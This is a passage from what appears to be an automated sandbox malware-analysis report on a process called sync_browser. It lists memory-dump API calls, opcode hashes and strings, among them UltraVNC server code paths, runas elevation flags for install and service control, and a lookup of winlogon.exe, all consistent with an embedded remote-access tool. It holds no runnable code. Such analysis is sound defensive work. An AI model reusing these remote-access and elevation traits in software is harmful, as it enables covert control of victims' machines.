                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                    • String ID: winlogon.exe
                                                    • API String ID: 1789362936-961692650
                                                    • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                    • Instruction ID: e2700e2f720123e407563f00a70591714a5c48e0f5810c78f582f6349946a22d
                                                    • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                    • Instruction Fuzzy Hash: D5113031618A4686EB24AB25F8146AEA7A0FFC8F98FC44232DD5E47294DF3CD505CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                    • String ID: -rebootforce$p$runas
                                                    • API String ID: 3648085421-45594291
                                                    • Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                    • Instruction ID: e582c9ee7d2f8d1da9c3763bdd937ec6d81f9a082d6e564d19548dfebdbcce3d
                                                    • Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                    • Instruction Fuzzy Hash: 9101E532619B8186E625AF20F49479BB7A4FB89744FC0013AEACD02B68DF3CD158CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                    • String ID: -stopservice$p$runas
                                                    • API String ID: 3648085421-4230321595
                                                    • Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                    • Instruction ID: 0d7054da8c68be5e96f8550efb5d1da1ab55919132fb1b376b9e46f86d45dbd3
                                                    • Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                    • Instruction Fuzzy Hash: 1B01C836619B8186E764AB20F49479EB7A4FB89B48FC00236DACD06B58DF7DD118CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                    • String ID: -install$p$runas
                                                    • API String ID: 3648085421-1683557327
                                                    • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                    • Instruction ID: a4d4a1623e10f46017574a02b508ac844e587a06a19df2e4dad247293b60f742
                                                    • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                    • Instruction Fuzzy Hash: 7F01DA36619B8186E764AB10F49479EB7A4FB89B48FC00236DACD07B58DF7DD118CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                    • String ID: -startservice$p$runas
                                                    • API String ID: 3648085421-278061118
                                                    • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                    • Instruction ID: 64b9eaa6f991ea59cc083c56c13efa819ab0f0cde98c7349ca8e6fc2811aeaf3
                                                    • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                    • Instruction Fuzzy Hash: 7F011A36618B8186E764AB10F49479EB7A4FB88B48FC00236DACD03B58DF7DD118CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: freemalloc
                                                    • String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
                                                    • API String ID: 3061335427-2748099863
                                                    • Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                    • Instruction ID: 93f0895fa257ec9b59380ebb96eb52479b3442d4352924f5fdf8bf5b822cac05
                                                    • Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                    • Instruction Fuzzy Hash: 2B41F7A2A1969286F714AB20E40177DBBA1EF54F88FC44133EE4D4769AEF3CE505C760
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
                                                    • API String ID: 0-3750121419
                                                    • Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                    • Instruction ID: 5af9ba90e3295ba2106ca9de8d26f6096831e708b5d4cccbbcadc6187cb9261f
                                                    • Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                    • Instruction Fuzzy Hash: AF31C565A0998185EA14EA66A8002ADA790EF45FF8FD41336EE3D47BD5DF3CD0428310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                    • String ID:
                                                    • API String ID: 3945334538-0
                                                    • Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                    • Instruction ID: 6a4e1e27ada7773127e8fddd701a145d9242b1b5eb6ceb0fb63e381e8f7f8681
                                                    • Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                    • Instruction Fuzzy Hash: 6D41E422B18A4183EB14AB29E4402BDA791EBC8FA9FC44132DF4D13799DF3CD881C764
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                    • String ID:
                                                    • API String ID: 2434734397-0
                                                    • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                    • Instruction ID: 7346d112dd2128604359ebd9ddaf1d7acea5560c874874e06f9fe9ea6bd8fa98
                                                    • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                    • Instruction Fuzzy Hash: 483146A1A0E60343FE54B769585927DE6925F40FE8FD55633DC2D872E2DF3CE8418220
                                                    APIs
                                                    • malloc.LIBCMT ref: 00007FF7D594FFFD
                                                      • Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
                                                      • Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
                                                      • Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8
                                                    • free.LIBCMT ref: 00007FF7D5950097
                                                      • Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
                                                      • Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
                                                      • Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C
                                                    • free.LIBCMT ref: 00007FF7D59500BF
                                                    Strings
                                                    • vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF7D5950053
                                                    • This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF7D5950068
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7D594FFE0
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                    • String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
                                                    • API String ID: 1063416079-3080451256
                                                    • Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                    • Instruction ID: 2ad34664e4f507796c1874a4f4b7fe94bfbd7dc32408abd7a58b19bc5c062111
                                                    • Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                    • Instruction Fuzzy Hash: 0F315E2161868182EA00EB65E8545AEA751EF84FB8FD85333ED7E476E5DF3CD401C360
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37CE
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37DC
                                                    • SetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3834
                                                      • Part of subcall function 00007FF7D59F32EC: Sleep.KERNEL32(?,?,?,00007FF7D59F37F7,?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19), ref: 00007FF7D59F3331
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3808
                                                    • free.LIBCMT ref: 00007FF7D59F382B
                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF7D59F381C
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                    • String ID:
                                                    • API String ID: 3106088686-0
                                                    • Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                    • Instruction ID: 72db0b7ec7d04cc2bbf8c897c7006036df9f5bdfe5ffa4e0ebd5b36ecbe544fe
                                                    • Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                    • Instruction Fuzzy Hash: E3015E25A0964287FA48BFB9A44447CA6A1AF88F94BC84236CD2E073D5DF3CE445C630
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3613856401-0
                                                    • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                    • Instruction ID: 1a9133eb46e94f904169fd4e1d190e3853ab1c8368c2a58169f9ca144499c78c
                                                    • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                    • Instruction Fuzzy Hash: B5016D22E1E64243FE55BA75984237C91509F95F6CFE90636EE6D461C3CF7CE84183A0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
